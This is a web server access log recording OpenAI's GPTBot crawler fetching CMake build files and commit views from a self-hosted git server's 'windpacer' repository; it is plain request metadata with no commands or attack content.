"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14319] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14319] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14321] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14320] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10303] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10303] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11351] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14600] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10005] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14601] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11353] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10263] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11351] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:16:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9986] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14600] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14600] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10264] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10263] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10003] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10005] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:16:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10305] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9937] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:16:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13709] [Gzip 6.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2349] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17080] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:16:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17752] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 